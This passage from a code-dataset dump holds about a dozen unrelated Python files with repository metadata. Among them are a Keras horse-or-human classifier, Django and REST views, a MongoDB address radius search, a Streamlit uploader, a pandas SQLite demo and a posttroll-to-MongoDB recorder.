human subdir have been created\")\n# NOTE : we do not label jpg data as human, horse, but it will recognized from the sub-directory names by using ImageGenerator\n\n# Directory with training horse/ human pictures\ntrain_horse_dir = os.path.join(\"./tmp/horse-or-human/horses\")\ntrain_human_dir = os.path.join(\"./tmp/horse-or-human/humans\")\n\n# filenames look like..\ntrain_horse_names = os.listdir(train_horse_dir)\n#print(train_horse_names[:10])\ntrain_human_names = os.listdir(train_human_dir)\n#print(train_human_names[:10])\n\nprint(\"Total training horse images:\", len(train_horse_names))\nprint(\"Total training human images:\", len(train_human_names))\n\n#%matplotlib inline # for notebook\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n'''\n# to display pictures\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n# Parameters for our graph; we'll output images in a 4x4 configuration\nnrows = 4\nncols = 4\n\n# Index for iterating over images\npic_index = 0\n# Set up matplotlib fig, and size it to fit 4x4 pics\nfig = plt.gcf()\nfig.set_size_inches(ncols * 4, nrows * 4)\n\npic_index += 8\nnext_horse_pix = [os.path.join(train_horse_dir, fname)\n for fname in train_horse_names[pic_index-8:pic_index]]\nnext_human_pix = [os.path.join(train_human_dir, fname)\n for fname in train_human_names[pic_index-8:pic_index]]\n\nfor i, img_path in enumerate(next_horse_pix+next_human_pix):\n # Set up subplot; subplot indices start at 1\n sp = plt.subplot(nrows, ncols, i + 1)\n sp.axis('Off') # Don't show axes (or gridlines)\n\n img = mpimg.imread(img_path)\n plt.imshow(img)\n\nplt.show()\n'''\n\n# building a model\nimport tensorflow as tf\nmodel = tf.keras.models.Sequential([\n # input shape : image 300 x 300 with 3 bytes color\n # first convolution\n tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(300,300,3)),\n tf.keras.layers.MaxPooling2D(2,2),\n # second convolution\n tf.keras.layers.Conv2D(32, (3,3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2,2),\n # third convolution\n tf.keras.layers.Conv2D(64, (3,3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2,2),\n # fourth convolution\n tf.keras.layers.Conv2D(64, (3,3), activation='relu'),\n tf.keras.layers.MaxPooling2D(2,2),\n # flatten the results to feed into a DNN\n tf.keras.layers.Flatten(),\n # 512 neuron hidden layers\n tf.keras.layers.Dense(512, activation='relu'),\n # only 1 output neron. contains a value from 0-1 (0=horse, 1=human)\n tf.keras.layers.Dense(1, activation='sigmoid')\n])\nmodel.summary()\n\nfrom tensorflow.keras.optimizers import RMSprop\nmodel.compile(loss='binary_crossentropy',\n optimizer=RMSprop(lr=0.001),\n metrics=['accuracy'])\n\n# data preprocessing\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n# all images will be rescaled by 1/255 (normalizaing)\ntrain_datagen = ImageDataGenerator(rescale=1/255)\n\n# flow training images in batches of 128 using train_datagen generator\n''' NOTE\nThis ImageDataGenerator class allows you to instantiate generators of augmented image batches (and their labels) via\n(1).flow(data, labels) or\n(2).flow_from_directory(directory).\n'''\ntrain_generator = train_datagen.flow_from_directory(\n '/Users/gina/Desktop/projects/DeepLearning/VisionNN/tmp/horse-or-human', #source of training images\n target_size=(300, 300),\n batch_size=128,\n #since we use binary_crossentropy loss, we need binary labels\n class_mode='binary')\n\n# training\nhistory = model.fit(\n train_generator,\n steps_per_epoch=8,\n epochs=3,\n verbose=1) # verbose = 0 for silent, verbose = 1 for progressing bar\n\n# running a prediction using the model\nprint(\"Running a prediction using the model...\")\n\nimport numpy as np\nfrom tensorflow.keras.preprocessing import image\n\n\n# predicting images\npath = \"/Users/gina/Desktop/projects/DeepLearning/VisionNN/content/\"\n\ntest_files = os.listdir(path)\nprint(\"test files:\", test_files)\n\nfor fn in test_files:\n img = image.load_img(path + fn, target_size=(300,300))\n x = image.img_to_array(img) #shape: (300,300,3)\n x = np.expand_dims(x, axis=0) #shape: (1,300,300,3)\n\n images = np.vstack([x]) #shape: (300,300,3)\n classes = model.predict(images, batch_size=10)\n print(classes[0])\n if classes[0] > 0.5:\n print(fn + \" is a human\")\n else:\n print(fn + \" is a horse\")\n\n# visualizing intermediate representations\n# NOTE: to get a feel for what kind of features our convnet has learnt,\n# visualize how an input gets transformed as it goes through the convnet.\nimport random\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\n\n# define a new model that will take an image as input, and will output\n# intermediate representations for all layers in the previous model after the first\n\nsuccessive_outputs = [layer.output for layer in model.layers[1:]] #model have 11 layers\n\nvisualization_model = tf.keras.models.Model(inputs = model.input,\n outputs = successive_outputs)\n\n# prepare a random input image from the training set\nhorse_img_files = [os.path.join(train_horse_dir, f) for f in train_horse_names]\nhuman_img_files = [os.path.join(train_human_dir, f) for f in train_human_names]\nimg_path = random.choice(horse_img_files + human_img_files) # choose 1 randomly\n\nimg = load_img(img_path, target_size=(300,300))\nx = img_to_array(img) # numpy array with shape (300, 300, 3)\nx = x.reshape((1,) + x.shape) # numpy array with shape (1,300,300,3)\n\n# rescale by 1/255\nx /= 255\n\n# obtaining all intermediate representations for this image\nsuccessive_feature_maps = visualization_model.predict(x)\nprint(\"successive_feature_maps list length:\", len(successive_feature_maps))\n\n# layers name\nlayer_names = [layer.name for layer in model.layers]\nprint(\"layers name:\", layer_names) #['conv2d', 'max_pooling2d', 'conv2d_1', 'max_pooling2d_1', 'conv2d_2', 'max_pooling2d_2', 'conv2d_3', 'max_pooling2d_3', 'flatten', 'dense', 'dense_1']\n\n# display\nfor layer_name, feature_map in zip(layer_names, successive_feature_maps):\n if len(feature_map.shape) == 4:\n # just do this for the conv/max pool layers, not fully-connected layers\n n_features = feature_map.shape[-1] # nums of features in feature map\n # the feature map has shape( 1, size, size, n_features)\n size = feature_map.shape[1]\n display_grid = np.zeros((size, size * n_features))\n for i in range(n_features):\n # Postprocess the feature to make it visually palatable\n x = feature_map[0, :, :, i]\n x -= x.mean()\n x /= x.std()\n x *= 64\n x += 128\n x = np.clip(x, 0, 255).astype('uint8')\n # We'll tile each filter into this big horizontal grid\n display_grid[:, i * size : (i + 1) * size] = x\n # Display the grid\n scale = 20. / n_features\n plt.figure(figsize=(scale * n_features, scale))\n plt.title(layer_name)\n plt.grid(False)\n plt.imshow(display_grid, aspect='auto', cmap='viridis')\n plt.show()\n# NOTE:As you can see we go from the raw pixels of the images to increasingly abstract and compact representations. The representations downstream start highlighting what the network pays attention to, and they show fewer and fewer features being \"activated\"; most are set to zero. This is called \"sparsity.\" Representation sparsity is a key feature of deep learning.\nprint(\"These representations carry increasingly less information about the original pixels of the image, but increasingly refined information about the class of the image. You can think of a convnet (or a deep network in general) as an information distillation pipeline. \")\n\n# clean up to terminate the kernel and free memory resources:\ninput_ = input(\"Termintate the kernel and free memory resource? (y/n):\")\nif input_ == \"y\":\n import os, signal\n os.kill(os.getpid(), signal.SIGKILL)\n","repo_name":"eunjeena/DeepLearning","sub_path":"VisionNN/human_horse.py","file_name":"human_horse.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15114864520","text":"class LoadedProcess:\n\n def __init__(self, id, process_id, repository_id):\n self.id = id\n self.process_id = process_id\n self.process_name = process_id\n self.process_description = ''\n self.repository_id = repository_id\n self.repository_name = repository_id\n self.repository_description = ''\n self.is_manager = False\n self.is_contributor = False\n self.reference_list = None\n self.identifier = None\n self.uri = ''\n self.description = ''\n self.category = ''\n self.version = ''\n self.quantity_disciplines_used = 0\n self.discipline_list = None\n self.associated_usecases = None\n\n def apply_ontology(self, processes_ontology_metadata):\n\n process_key = f'{self.repository_id}.{self.process_id}'\n\n ontology_process_request = list(filter(lambda po: po['id'] == process_key, processes_ontology_metadata))\n\n if len(ontology_process_request) == 1:\n ontology_process = ontology_process_request[0]\n self.deserialize(ontology_process)\n\n def deserialize(self, json_dict):\n self.identifier = json_dict['id']\n self.uri = json_dict['uri']\n self.process_name = json_dict['label']\n self.description = json_dict['description']\n self.category = json_dict['category']\n self.version = json_dict['version']\n self.repository_name = json_dict['process_repository_label']\n self.quantity_disciplines_used = json_dict['quantity_disciplines_used']\n self.discipline_list = json_dict['discipline_list']\n self.associated_usecases = json_dict['associated_usecases']\n\n def serialize(self):\n \"\"\" json serializer for dto purpose\n \"\"\"\n return {\n 'id': self.id,\n 'process_id': self.process_id,\n 'process_name': self.process_name,\n 'process_description': self.process_description,\n 'repository_id': self.repository_id,\n 'repository_name': self.repository_name,\n 'repository_description': self.repository_description,\n 'is_manager': self.is_manager,\n 'is_contributor': self.is_contributor,\n 'reference_list': self.reference_list,\n 'identifier': self.identifier,\n 'uri': self.uri,\n 'description': self.description,\n 'category': self.category,\n 'version': self.version,\n 'quantity_disciplines_used': self.quantity_disciplines_used,\n 'discipline_list': self.discipline_list,\n 'associated_usecases': self.associated_usecases\n }\n","repo_name":"os-climate/sostrades-webapi","sub_path":"sos_trades_api/models/loaded_process.py","file_name":"loaded_process.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39994284160","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os.path import join\nimport sys\nimport unittest\nfrom glob import glob\n\nsys.path.append('../../')\nfrom swbd.input_data import read_audio\nfrom swbd.labels.ldc97s62.character import read_trans\nfrom utils.measure_time_func import measure_time\nfrom utils.util import mkdir_join\n\nswbd_trans_path = '/n/sd8/inaguma/corpus/swbd/swb_ms98_transcriptions'\nhtk_save_path = '/n/sd8/inaguma/corpus/swbd/htk'\nwav_save_path = '/n/sd8/inaguma/corpus/swbd/wav'\n\n# Search paths to transcript\nlabel_paths = []\nfor trans_path in glob(join(swbd_trans_path, '*/*/*.text')):\n if trans_path.split('.')[0][-5:] == 'trans':\n label_paths.append(trans_path)\nlabel_paths = sorted(label_paths)\n\nwb_paths = []\nfor wb_path in glob(join(swbd_trans_path, '*/*/*.text')):\n if wb_path.split('.')[0][-4:] == 'word':\n wb_paths.append(wb_path)\nwb_paths = sorted(wb_paths)\n\n# Search paths to audio files\nwav_paths = [wav_path for wav_path in glob(join(wav_save_path, 'swbd/*.wav'))]\nhtk_paths = [htk_path for htk_path in glob(join(htk_save_path, 'swbd/*.htk'))]\n\nCONFIG = {\n 'feature_type': 'logmelfbank',\n 'channels': 40,\n 'sampling_rate': 8000, # NOTE: 8000Hz\n 'window': 0.025,\n 'slide': 0.01,\n 'energy': False,\n 'delta': True,\n 'deltadelta': True\n}\n\n\nclass TestInputLDC97S62(unittest.TestCase):\n\n def test(self):\n\n self.speaker_dict = read_trans(\n label_paths=label_paths,\n word_boundary_paths=wb_paths,\n run_root_path='../',\n vocab_file_save_path=mkdir_join('../config/vocab_files'),\n save_vocab_file=False)\n\n self.check(normalize='global', tool='htk')\n self.check(normalize='speaker', tool='htk')\n self.check(normalize='utterance', tool='htk')\n\n # self.check(normalize='global', tool='python_speech_features')\n # self.check(normalize='speaker', tool='python_speech_features')\n # self.check(normalize='utterance', tool='python_speech_features')\n\n # self.check(normalize='global', tool='librosa')\n # self.check(normalize='speaker', tool='librosa')\n # self.check(normalize='utterance', tool='librosa')\n\n @measure_time\n def check(self, normalize, tool):\n\n print('=' * 50)\n print(' normalize: %s' % normalize)\n print(' tool: %s' % tool)\n print('=' * 50)\n\n audio_paths = htk_paths if tool == 'htk' else wav_paths\n\n read_audio(audio_paths=audio_paths,\n tool=tool,\n config=CONFIG,\n normalize=normalize,\n speaker_dict=self.speaker_dict,\n is_training=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"hirofumi0810/asr_preprocessing","sub_path":"swbd/test/test_input_ldc97s62.py","file_name":"test_input_ldc97s62.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"67"} +{"seq_id":"6186498731","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.HomeListView.as_view(), name='home'),\n path('immobile//', views.ImmobileDetailView.as_view(), name='detail'),\n path('schedule-visits/', views.schedules_visit, name='schedule-visits'),\n path('schedules/', views.SchedulesListView.as_view(), name='schedules'),\n path('cancel-schedules/', views.cancel_schedule, name='cancel-schedules'),\n]\n","repo_name":"jvitor425/Avaliacao-3-Banco-de-Dados-II","sub_path":"plataform/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32893889350","text":"\n\n\n\nfrom .base import *\n\n\ndef get_int_dtypes():\n dtypes = []\n for n in [64,32,16,8]:\n for p in ['','u']:\n dtypes.append(\n getattr(np,f'{p}int{n}'))\n return dtypes\n\n\ndef is_ok(series, dtype):\n iinfo = np.iinfo(dtype)\n first = iinfo.min < series.min() < iinfo.max\n second = iinfo.min < series.max() < iinfo.max\n return first and second\n\n\ndef reduce_memory_usage(df):\n dtypes = get_int_dtypes()\n int_cc = df.select_dtypes(\n include=dtypes).columns\n for c in int_cc:\n best_dtype = np.int64\n for dtype in dtypes:\n if is_ok(df[c], dtype):\n best_dtype = dtype\n df[c] = df[c].astype(best_dtype)\n float_cc = df.select_dtypes(\n include=[np.float64,np.float32]).columns\n for c in float_cc:\n df[c] = df[c].astype(np.float16)\n \n ","repo_name":"lyghter/data-fusion-puzzle","sub_path":"lib/base/dataframe.py","file_name":"dataframe.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"29195685277","text":"from django.shortcuts import render\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework import parsers\nfrom rest_framework import renderers\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.authentication import TokenAuthentication, SessionAuthentication #, BasicAuthentication\nfrom rest_framework.authtoken.serializers import AuthTokenSerializer\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.authtoken import views as auth_views\nfrom cliente.serializers import UserSerializer\n# Create your views here.\n\n\n\n\nUserModel = get_user_model()\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = UserModel.objects.all()\n serializer_class = UserSerializer\n\n def list(self, request):\n if request.user.is_superuser:\n serializer = self.get_serializer(self.queryset, many=True)\n return Response(serializer.data)\n\n queryset = UserModel.objects.all()\n serializer = self.get_serializer(self.queryset, many=True)\n return Response(serializer.data)\n\n def create(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\n\nclass UserAuthentication(APIView):\n throttle_classes = ()\n permission_classes = ()\n parser_classes = (parsers.FormParser, parsers.MultiPartParser, parsers.JSONParser,)\n renderer_classes = (renderers.JSONRenderer,)\n serializer_class = AuthTokenSerializer\n \n def get_serializer_context(self):\n return {\n 'request': self.request,\n 'format': self.format_kwarg,\n 'view': self\n }\n\n def get_serializer(self, *args, **kwargs):\n kwargs['context'] = self.get_serializer_context()\n return self.serializer_class(*args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n user_id = UserModel.objects.get(pk=user.pk).id\n return Response({'token': token.key,'user_id':user.id})\n\n\nobtain_auth_token = UserAuthentication.as_view()","repo_name":"amarotxt/medicar","sub_path":"BackEnd/source/cliente/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72094958935","text":"n = int(input())\nd = {}\nlevels = {}\nroot = 'Isenbaev'\n\nfor i in range(n):\n\ta, b, c = input().split()\n\n\tif d.get(a) == None:\n\t\td[a] = set()\n\n\td[a].add(b)\n\td[a].add(c)\n\n\tif d.get(b) == None:\n\t\td[b] = set()\n\n\td[b].add(a)\n\td[b].add(c)\n\t\n\tif d.get(c) == None:\n\t\td[c] = set()\n\n\td[c].add(a)\n\td[c].add(b)\n\nif d.get(root) != None:\n\tlevels[root] = 0\n\n\tcurrent_dude = root\n\tqueue = [current_dude]\n\tcurrent = 0\n\n\twhile current < len(queue) and current < 50:\n\t\tcurrent_dude = queue[current]\n\n\t\tfor i in d[current_dude]:\n\t\t\tif levels.get(i) != None:\n\t\t\t\tcontinue\n\n\t\t\tlevels[i] = levels[current_dude] + 1\n\t\t\tqueue.append(i)\n\n\t\tcurrent += 1\n\nfor i in sorted(d.keys()):\n\tif levels.get(i) != None:\n\t\tprint(i, levels[i])\n\telse:\n\t\tprint(i, 'undefined')","repo_name":"kokosda/sport-programming","sub_path":"src/timus/timus_1837.py","file_name":"timus_1837.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71957346133","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#---------------------------------------------\ndef main(argv):\n\n data = pd.DataFrame({\n 'Neutral': [593, 637],\n 'Happiness': [69, 1511],\n 'Sadness': [28, 23],\n 'Anger': [45, 28],\n 'Fear': [25, 1],\n 'Surprise': [83, 11],\n 'Disgust': [59, 11]\n },\n columns=('Neutral', 'Happiness', 'Sadness', 'Anger',\n 'Fear', 'Surprise', 'Disgust'),\n index=['CK+', '10K']\n )\n data.index.name = 'Dataset'\n\n pal = sns.color_palette('colorblind', 8)\n\n fig, axes = plt.subplots(1, 2)\n\n ax = sns.heatmap(data, annot=True, fmt='d', linewidths=.5, ax=axes[0], cmap='Blues')\n ax.set_xlabel('Emotion Labels', fontsize=15)\n ax.set_ylabel('Dataset', fontsize=15)\n ax.set_title('Samples per Dataset', fontsize=25)\n\n perc = data.sum()\n perc /= perc.sum()\n\n ax = sns.barplot(x=data.columns, y=perc, ax=axes[1], palette=pal)\n ax.set_xlabel('Emotion Labels', fontsize=15)\n ax.set_ylabel('Percentage of Samples', fontsize=15)\n ax.set_title('Total of Samples', fontsize=25)\n\n plt.show()\n\n return 0\n\n#---------------------------------------------\n# namespace verification for invoking main\n#---------------------------------------------\nif __name__ == '__main__':\n main(sys.argv[1:])","repo_name":"luigivieira/fsdk","sub_path":"fsdk/reports/emotions-datasets.py","file_name":"emotions-datasets.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9396516013","text":"\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework import permissions\nfrom pymongo import MongoClient\n\n\n@permission_classes((permissions.AllowAny,))\nclass address_search(viewsets.ViewSet):\n def list(self, request):\n radius=request.query_params['radius']\n try:\n if not request.query_params['radius'].isdigit():\n return Response({'status':'ERROR','error':'INVALID_radius'})\n except:\n return Response({'status':'ERROR','error':'NO_radius_SPECIFIED'})\n Address = \"\"\n\n if (\"Address\" in request.query_params):\n Address = request.query_params['Address']\n else:\n return Response({'status': 'ERROR',\n 'error': 'Please Enter a valid Address'})\n db_client = MongoClient(host='52.91.122.15', port=27017) \n location=Address\n data_1=list(db_client.MLSLite.miami1L.find({\"UnparsedAddress\":location},{'Latitude':1,'Longitude':1}))\n lat=[]\n long=[]\n for i in data_1:\n lat.append(i[\"Latitude\"])\n long.append(i[\"Longitude\"])\n \n rad=int(radius)\n data_2=list(db_client.MLSLite.miami1L.find({\"$where\":\"getDistanceFromLatLonInKm(%s,%s,this.Latitude,this.Longitude) <= %s\"%(lat,long,rad)},{'UnparsedAddress':1,'City':1,'StateOrProvince':1, 'PostalCode':1, 'PostalCodePlus4':1, 'ParcelNumber':1,\n 'PropertyType':1,\n 'PropertySubType':1,\n 'LotSizeSquareFeet':1,\n 'LivingArea':1,\n 'ArchitecturalStyle':1,\n 'Heating':1,\n 'Cooling':1,\n 'StoriesTotal':1,\n 'Stories':1,\n 'YearBuilt':1,\n 'Roof':1,\n 'ConstructionMaterials':1,\n 'BedroomsTotal':1,\n 'BathroomsTotalInteger':1,\n 'ParkingFeatures':1,\n 'PoolFeatures':1,\n 'View':1,\n 'PatioAndPorchFeatures':1,\n 'Basement':1,\n 'FireplacesTotal':1,\n 'FireplaceYN':1,\n 'FireplaceFeatures':1,\n 'InteriorFeatures':1,\n 'ExteriorFeatures':1,\n 'OtherStructures':1,\n 'PublicRemarks':1,\n 'LotFeatures':1,\n 'ZoningDescription':1,\n 'CommunityFeatures':1,\n 'ElementarySchoolDistrict':1,\n 'MiddleOrJuniorSchoolDistrict':1,\n 'HighSchoolDistrict':1,\n 'ElementarySchool':1,\n 'MiddleOrJuniorSchool':1,\n 'HighSchool':1,\n 'Appliances':1,\n 'LotSizeDimensions':1,\n 'Topography':1,\n 'WaterSource':1,\n 'ListingContractDate':1,\n 'StandardStatus':1,\n 'MlsStatus':1,\n 'ListPrice':1,\n 'CloseDate':1,\n 'ListAgentStateLicense':1,\n 'ListAgentFullName':1,\n 'ListAgentPreferredPhone':1,\n 'ListAgentEmail':1,\n 'ListOfficeName':1,\n 'ListOfficePhone':1,\n 'ListOfficeEmail':1,\n 'ListingId':1,\n 'ListingKey':1,\n 'ModificationTimestamp':1,\n 'SI_FIPS':1,\n 'SI_PropertyRefID':1,\n 'SI_PriceperSquareFeet':1,\n 'WaterfrontFeatures':1,\n 'SI_WaterYN':1,\n 'SI_DaysOnMarket':1,\n 'SI_ListingNumber':1,\n 'SI_SoldPriceRange':1,\n 'SI_AdjustedSoldPrice':1,\n 'MemberAddress1':1,\n 'OfficeAddress1':1,\n 'Latitude':1,\n 'Longitude':1,\n 'Distance':1,\n 'SubjectProperty':1}))\n\n\n for i in data_2:\n if i[\"UnparsedAddress\"]==location:\n i[\"subject_property\"]=\"true\"\n else: \n i[\"subject_property\"]=\"false\"\n \n \n map(lambda data_1: data_1.pop('_id'), data_2)\n finalObj = {\"Listings\":data_2,\"Total_Comparables\":len(data_2)}\n return Response(finalObj)","repo_name":"vishnusk12/Address-Based-Radius-Search-API","sub_path":"Address_Search_MLSLite/Address_Search_MLSLite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"7757657790","text":"from random import choice\n\nsustantivos = ['perro', 'gato', 'cerdo', 'muchacho', 'auto']\nadjetivos = ['alegre', 'triste', 'emocionado', 'tranquilo']\nverbos = ['saltó', 'jugó', 'mordió', 'corrió', 'gritó']\n\nsustantivo = choice(sustantivos)\nsustantivo2 = choice(sustantivos)\nadjetivos = choice(adjetivos)\nverbo = choice(verbos)\n\nprint('El {} {} al {} y fue {}.'.format(sustantivo, verbo, sustantivo2, adjetivos))\n","repo_name":"CarlosVV/PythonGroup_07","sub_path":"clase02/madlibs.py","file_name":"madlibs.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5570066332","text":"# Запуск через команду в консоль: streamlit run my.py\n# Использовал PyCharm как IDE.\nimport io\nimport streamlit.components.v1 as components\nimport streamlit as st\nfrom PIL import Image\n\n# components.html(\n# \"\"\"\n# \n# \n# \n# \n# \n# \"\"\",\n# )\n\nst.markdown(\"\"\"\n\n\"\"\", unsafe_allow_html=True)\n\ndef load_image():\n # Форма для загрузки изображения\n uploaded_file = st.file_uploader(\n label='Выберите изображение для нахождения мишек.')\n if uploaded_file is not None:\n # Получение загруженного изображения\n image_data = uploaded_file.getvalue()\n # Показ загруженного изображения на Web-странице средствами Streamlit\n st.image(image_data)\n # Возврат изображения в формате PIL\n return Image.open(io.BytesIO(image_data))\n else:\n return None\n\n# Выводим заголовок страницы средствами Streamlit\nst.title('Мишки! (Или кого мы там ищем.)')\n# Вызываем функцию создания формы загрузки изображения\nimg = load_image()","repo_name":"SonderHeim/ADPython","sub_path":"my.py","file_name":"my.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"1199058436","text":"\"\"\"\nWorking with a SQL database with pandas.\nAuthor: Andrew Jarombek\nDate: 2/24/2020\n\"\"\"\n\nfrom sqlalchemy import MetaData, Column, Table, String, create_engine\nimport pandas as pd\nimport numpy as np\n\n# SQLite is an in-application database.\nengine = create_engine('sqlite:///test.sqlite')\n\nmeta = MetaData()\n\nstuffed_animals = Table(\n 'stuffed_animals', meta,\n Column('name', String, primary_key=True),\n Column('species', String, nullable=False),\n Column('caretaker', String, nullable=False)\n)\n\nmeta.drop_all(engine)\nmeta.create_all(engine)\n\n# Some of my stuffed friends and my sisters.\ninsert_dotty = stuffed_animals.insert().values(name='Dotty', species='Horse', caretaker='Andy')\ninsert_lily = stuffed_animals.insert().values(name='Lily', species='Bear', caretaker='Andy')\ninsert_fluffy = stuffed_animals.insert().values(name='Fluffy', species='Goat', caretaker='Andy')\ninsert_puffy = stuffed_animals.insert().values(name='Puffy Duffy', species='Dog', caretaker='Laurel')\ninsert_sock = stuffed_animals.insert().values(name='Sock Monkey', species='Monkey', caretaker='Laurel')\n\nconnection = engine.connect()\n\nconnection.execute(insert_dotty)\nconnection.execute(insert_lily)\nconnection.execute(insert_fluffy)\nconnection.execute(insert_puffy)\nconnection.execute(insert_sock)\n\nresult: pd.DataFrame = pd.read_sql('select * from stuffed_animals', engine)\nprint(result)\n\nassert (result.head(3).values == np.array([\n ['Dotty', 'Horse', 'Andy'],\n ['Lily', 'Bear', 'Andy'],\n ['Fluffy', 'Goat', 'Andy']\n])).all()\n","repo_name":"AJarombek/data-analytics-prototypes","sub_path":"Python/pandas/pandas-sqlite.py","file_name":"pandas-sqlite.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16575461647","text":"from posttroll.subscriber import Subscribe\nimport logging\nfrom threading import Thread\nimport yaml\nimport os\n\nfrom pymongo import MongoClient\nlogger = logging.getLogger(__name__)\n\n\nclass MongoRecorder:\n \"\"\"A recorder for posttroll file messages.\"\"\"\n\n def __init__(self,\n mongo_uri=\"mongodb://localhost:27017\",\n db_name='sat_db'):\n \"\"\"Init the recorder.\"\"\"\n self.db = MongoClient(mongo_uri)[db_name]\n self.loop = True\n self._recorder = Thread(target=self.record)\n\n def start(self):\n \"\"\"Start the recording.\"\"\"\n self._recorder.start()\n\n def insert_files(self, msg):\n \"\"\"Insert files in the database.\"\"\"\n self.db.files.insert_one(msg.data)\n\n def record(self):\n \"\"\"Log stuff.\"\"\"\n try:\n with Subscribe(\"\", addr_listener=True) as sub:\n for msg in sub.recv(timeout=1):\n if msg:\n logger.debug(\"got msg %s\", str(msg))\n if msg.type in ['collection', 'file', 'dataset']:\n self.insert_files(msg)\n if not self.loop:\n logger.info(\"Stop recording\")\n break\n except Exception:\n logger.exception(\"Something went wrong in record\")\n raise\n\n def stop(self):\n \"\"\"Stop the machine.\"\"\"\n self.loop = False\n\n\nlog_levels = {\n 0: logging.WARN,\n 1: logging.INFO,\n 2: logging.DEBUG,\n}\n\n\ndef setup_logging(cmd_args):\n \"\"\"Set up logging.\"\"\"\n if cmd_args.log_config is not None:\n with open(cmd_args.log_config) as fd:\n log_dict = yaml.safe_load(fd.read())\n logging.config.dictConfig(log_dict)\n return\n\n root = logging.getLogger('')\n root.setLevel(log_levels[cmd_args.verbosity])\n\n if cmd_args.log:\n fh_ = logging.handlers.TimedRotatingFileHandler(\n os.path.join(cmd_args.log),\n \"midnight\",\n backupCount=7)\n else:\n fh_ = logging.StreamHandler()\n\n formatter = logging.Formatter(LOG_FORMAT)\n fh_.setFormatter(formatter)\n\n root.addHandler(fh_)\n\n\nLOG_FORMAT = \"[%(asctime)s %(name)s %(levelname)s] %(message)s\"\n\nif __name__ == '__main__':\n import time\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-d\", \"--database\",\n help=\"URI to the mongo database (default mongodb://localhost:27017 ).\",\n default=\"mongodb://localhost:27017\")\n parser.add_argument(\"-l\", \"--log\",\n help=\"The file to log to. stdout otherwise.\")\n parser.add_argument(\"-c\", \"--log-config\",\n help=\"Log config file to use instead of the standard logging.\")\n parser.add_argument(\"-v\", \"--verbose\", dest=\"verbosity\", action=\"count\", default=0,\n help=\"Verbosity (between 1 and 2 occurrences with more leading to more \"\n \"verbose logging). WARN=0, INFO=1, \"\n \"DEBUG=2. This is overridden by the log config file if specified.\")\n cmd_args = parser.parse_args()\n\n logger = logging.getLogger(\"mongo_recorder\")\n logger.setLevel(logging.DEBUG)\n setup_logging(cmd_args)\n logger.info(\"Starting up.\")\n\n try:\n recorder = MongoRecorder(cmd_args.database)\n recorder.start()\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n recorder.stop()\n print(\"Thanks for using pytroll/mongo_recorder. See you soon on www.pytroll.org!\")\n","repo_name":"pytroll/pytroll-db","sub_path":"bin/pytroll-mongo.py","file_name":"pytroll-mongo.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25689854150","text":"# Editor: 박민지\r\n\r\ndef abbreviation(name):\r\n token = name.split()\r\n abb = \"\"\r\n for item in token:\r\n if item[0].isupper():\r\n abb += 